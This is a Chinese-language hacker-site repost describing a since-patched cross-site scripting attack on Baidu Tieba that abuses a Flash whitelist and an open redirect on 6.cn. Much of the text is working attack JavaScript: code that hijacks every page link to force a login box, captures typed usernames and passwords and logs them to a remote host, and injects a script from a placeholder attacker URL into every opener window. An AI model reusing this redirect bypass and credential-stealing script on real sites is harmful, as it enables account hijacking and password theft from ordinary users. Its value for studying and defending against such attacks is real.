百度贴吧跨站的细节 百度贴吧, 细节

keylong

百度贴吧跨站的细节


文章录入：浣花溪    责任编辑：snow  121  
【字体：小 大】

前段时间发现了QQ、百度等一些安全问题，已补。QQ的那个比较敏感不能发了，摘几段百度的细节发发吧。
漏洞细节：
百度X吧发帖允许发送指定白名单URL的FLASH，白名单如下：

flashWhiteList:["<a href="http://www.tudou.com/v/%22,%22http://www.tudou.com/player/playlist.swf?lid=","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/">http://www.tudou.com/v/","http://www.tudou.com/player/playlist.swf?lid=","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/"]
复制代码

黑客只需要在白名单URL中找到一个可以嵌入FLASH的漏洞，原白名单http://6.cn/的URL过于宽松，于是在http://6.cn上找到一个301，302状态的转跳URL即可嵌入任意的FLASH文件，如：
http://6.cn/logout.php?next_action=http://xxxxxx/xxxx.swf
该FLASH的功能是在当前页面嵌入一个js，同时在有关联关系的引用窗口跨页面嵌入一个js，也就是在x吧浏览过的网页都能被自动嵌入js。该JS脚本的功能是劫持用户的点击，强制用户登录，并记录用户输入的密码！

部分代码如下：
1.劫持网页所有的链接，强制弹出登录框

for(i=0;i<document.links.length;i++){

document.links.onclick=function(){

   TbUtil.login(); //x吧自带的登录函数，弹出登录框层。

   return false;

}

}
复制代码

2.劫持登录框的输入，取到用户输入的用户名和密码，并偷偷发送到远程。

document.onkeyup=function(){

document.forms['PassFormlogin'].onsubmit=function(){

   pwd = this.PassInputUsername0.value + '|' + this.PassInputPassword0.value;

   log(escape(pwd));

}

}
复制代码


3.跨页面劫持窗口

function i_(){

with(document){getElementsByTagName('head')[0].appendChild(createElement('script')).src='http://xxx/xxx.js';

}

}i_()



w_=window;

while(w_=w_.opener){

try{

   w_.eval(i_.toString()+'i_()')

}catch(e){}

}
复制代码

盗取的管理员的细节：
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


摘自红色黑客联盟(www.7747.net) 原文：http://www.7747.net/Article/201005/47482.html